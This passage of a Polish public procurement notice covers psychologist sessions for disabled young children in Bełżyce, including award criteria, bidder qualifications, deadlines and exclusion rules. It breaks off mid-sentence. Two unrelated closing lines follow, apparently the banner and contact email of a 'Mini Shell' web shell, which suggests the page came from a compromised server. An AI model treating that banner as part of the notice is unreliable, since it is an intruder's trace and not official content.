2.4, Priorytet II Programu: &#34;Wieloaspektowa i kompleksowa pomoc niepełnosprawnemu dziecku w okresie od 0. roku życia do rozpoczęcia nauki w szkole oraz jego rodzinie” na rzecz Poradni Psychologiczno–Pedagogicznej w Bełżycach ul. Fabryczna 2b, 24 – 200 Bełżyce przez specjalistów z zakresu zajęć z psychologiem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312120-6 - Usługi opieki dziennej nad dziećmi i młodzieżą niepełnosprawną</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <p class="mb-0">85311300-5 - Usługi opieki społecznej dla dzieci i młodzieży</p> <p class="mb-0">98200000-5 - Usługi konsultacyjne dotyczące zapewniania równych szans</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Kryterium „Cena” w zł:<br/>1)	znaczenie kryterium – 60% (60 pkt);<br/>2)	opis sposobu oceny ofert dla kryterium „Ceny”: <br/>Lcena = (Cmin / C) x 60 pkt<br/>gdzie:<br/>a)	Lcena – liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty;<br/>b)	Cmin – cena w ofercie z najniższą ceną;<br/>c)	C – cena w ofercie ocenianej.<br/>2.	Kryterium „Dodatkowe doświadczenie zawodowe osoby prowadzącej zajęcia”:<br/>1)	znaczenie kryterium – 40% (40 pkt);<br/>2)	opis sposobu oceny ofert dla kryterium „Dodatkowe doświadczenie zawodowe osoby prowadzącej zajęcia”:<br/>Zamawiający ustalił minimalne wymagane doświadczenie dla potwierdzania spełniania warunku w zakresie dotyczącym zdolności zawodowej w rozdziale XVI. 2. c) SWZ. Warunek ten wymaga dysponowania co najmniej jedną osobą, która posiada co najmniej 2 letnie doświadczenie w pracy z dziećmi niepełnosprawnymi bądź zagrożonymi niepełnosprawnością w wieku od 0 do 7 roku życia. W ramach kryterium „Dodatkowe doświadczenie zawodowe osoby prowadzącej zajęcia” (D) oceniane będzie dodatkowe doświadczenie w pracy z niepełnosprawnymi dziećmi bądź zagrożonymi niepełnosprawnością w wieku od 0 do 7 roku życia wyrażone w latach.<br/>W przypadku, gdy Wykonawca zadeklaruje, że osoba posiada doświadczenie większe niż minimalne wskazane w warunku udziału w postępowaniu otrzyma punkty w sposób następujący: <br/>1) doświadczenie wynoszące do 2 lat – 0 pkt<br/>2) doświadczenie wynoszące powyżej 2 lat do 3 lat – 10 pkt,<br/>3) doświadczenie wynoszące powyżej 3 lat do 4 lat – 20 pkt,<br/>4) doświadczenie wynoszące powyżej 4 lat do 5 lat – 30 pkt,<br/>5) doświadczenie wynoszące powyżej 5 lat do 6 lat – 40 pkt.<br/>Zamawiający w przypadku wskazania przez oferenta doświadczenia wynoszącego powyżej 6 lat przyzna oferentowi maksymalnie 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„Dodatkowe doświadczenie zawodowe osoby prowadzącej zajęcia”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa warunek udziału w postępowaniu w zakresie zdolności zawodowej.<br/>2. Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności zawodowej jeżeli wykaże, że dysponuje co<br/>najmniej jedną osobą, która powinna posiadać:<br/>a) kwalifikacje do zajmowania stanowiska nauczyciela i kwalifikacje do prowadzenia zajęć wczesnego wspomagania<br/>rozwoju dziecka (§ 15 ust. 4 pkt 1 i 3 Rozporządzenia MEN z 1 sierpnia 2017 r. w sprawie szczegółowych kwalifikacji<br/>wymaganych od nauczycieli (Dz. U. z 2020 r. poz. 1289),<br/>b) ukończone studia podyplomowe lub kurs kwalifikacyjny z zakresu psychologii,<br/>c) co najmniej 2 letnie doświadczenie w pracy z dziećmi niepełnosprawnymi bądź zagrożonymi niepełnosprawnością w<br/>wieku od 0 do 7 roku życia.<br/>Uwaga:<br/>1. Wymagane doświadczenie należy obliczyć tylko za okresy faktycznego świadczenia usługi w pracy z dziećmi<br/>niepełnosprawnymi w wieku od 0 do 7 roku życia. Dublujące się okresy doświadczenia można uwzględniać tylko<br/>jednokrotnie, czyli okresu pracy przy wykonywaniu dwóch zadań w tym samym czasie nie można podwójnie wliczać do<br/>okresu doświadczenia.<br/>2. W przypadku Wykonawców zagranicznych uprawnienia równoważne do wyżej wskazanych zgodnie z zasadami<br/>określonymi we właściwych przepisach. Zamawiający dopuszcza osoby posiadające odpowiednie kwalifikacje zawodowe<br/>zdobyte w innych państwach z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2021 r. poz. 1646). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności zawodowej zamawiający<br/>żąda wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; wzór wykazu tych osób<br/>stanowi Załącznik nr 9 do SWZ,<br/>2. Jeżeli wykonawca powołuje się na doświadczenie w realizacji usługi, wykonywanej wspólnie z innymi wykonawcami, wykaz, o<br/>którym mowa w ust. 1 pkt 2, dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty składanej w odpowiedzi na ogłoszenie o zamówieniu wykonawca dołącza oświadczenie, o którym mowa w art. 125<br/>ust. 1 Pzp. Oświadczenie, o którym mowa w art. 125 ust. 1 Pzp, stanowi dowód potwierdzający brak podstaw wykluczenia i<br/>spełnianie warunków udziału w postępowaniu, na dzień składania ofert. Wzór oświadczenia o braku podstaw wykluczenia<br/>stanowi Załącznik nr 4 do SWZ. Wzór oświadczenia o spełnianiu warunków udziału w postępowaniu stanowi Załącznik nr 5<br/>do SWZ.<br/>8. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 Pzp, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>9. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie podmiotu udostępniającego zasoby, przekazuje się w<br/>postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym. Wzór zobowiązania podmiotu udostępniającego zasoby stanowi Załącznik nr 6 do SWZ.<br/>10. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia,<br/>wraz z oświadczeniem, o którym mowa w art. 125 ust. 1 Pzp, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w<br/>jakim wykonawca powołuje się na jego zasoby. Wzory oświadczeń podmiotu udostępniającego zasoby potwierdzające brak<br/>podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu stanowią odpowiednio Załącznik nr<br/>7 i Załącznik nr 8 do SWZ.<br/>Oferta musi zawierać także załącznik nr 2.1 do SWZ stanowiący integralną część treści oferty, zawierający informacje<br/>niezbędne do przyznania punktów w kryterium oceny ofert.<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności zawodowej<br/>zamawiający żąda wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami<br/>na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami; wzór wykazu tych osób stanowi Załącznik nr 9 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w ust. 1, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>4. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, zamawiający<br/>może żądać od wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru.<br/>5. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w ust. 4, jeżeli zamawiający może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do<br/>tych dokumentów.<br/>6. Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o<br/>których mowa w ust. 4, zamawiający może żądać od wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego<br/>umocowanie do reprezentowania wykonawcy.<br/>7. Przepis ust. 6 stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego.<br/>8. Przepisy ust. 4-6 stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach<br/>określonych w art. 118 Pzp lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do<br/>realizacji których te zdolności są wymagane.<br/>4. Zgodnie z art. 117 ust. 4 Pzp w przypadku, o którym mowa w ust. 4, wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. Wzór oświadczenia, o którym mowa w art. 117 ust. 4 Pzp stanowi Załącznik nr 10 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w przypadku wystąpienia co najmniej jednej z<br/>okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia, tj.:<br/>a) zmiany strony umowy w sytuacji następstwa prawnego wynikającego<br/>z odrębnych przepisów,<br/>b) zmiany umowy jeżeli nie jest możliwe zrealizowanie przedmiotu umowy<br/>w przypadku wystąpienia okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od żadnej ze Stron,<br/>zewnętrzne, niemożliwe do zapobieżenia, które nastąpiły po dniu wejścia w życie umowy, w szczególności: wojny, akty<br/>terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej, ogłoszenia stanu epidemicznego, pandemii,<br/>przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi występowania<br/>okoliczności siły wyższej.<br/>2. Zmiany umowy można wprowadzić na zasadach określonych art. 454 i 455 ustawy PZP.<br/>3. Wszelkie zmiany niniejszej umowy wymagają – pod rygorem nieważności – zachowania formy pisemnej w postaci aneksu <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-26 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-26 09:40</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Podstawy wykluczenia, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U z<br/>2023 r. poz. 129 z późn. zm.).<br/>1. Z postępowania o udzielenie zamówienia wyklucza się:<br/>1) wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo<br/>wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w<br/>art. 1 pkt 3 ww. ustawy;<br/>2) wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu<br/>pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 r. poz.1124) jest osoba wymieniona w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od<br/>dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy<br/>wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o<br/>rachunkowości (t.j. Dz. U. z 2023 r. poz. 1497) jest podmiot wymieniony w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24<br/>lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3 ww. ustawy.<br/>2. Wykluczenie następuje na okres trwania okoliczności określonych w ust. 1.<br/>3. W przypadku wykonawcy wykluczonego na podstawie ust. 1, zamawiający odrzuca ofertę takiego wykonawcy, nie<br/>zaprasza go do złożenia oferty podlegającej negocjacjom, oferty dodatkowej, oferty lub, nie zaprasza go do negocjacji, a<br/>także nie prowadzi z takim wykonawcą negocjacji, odpowiednio do trybu stosowanego do udzielenia

Creat By MiNi SheLL
Email: jattceo@gmail.com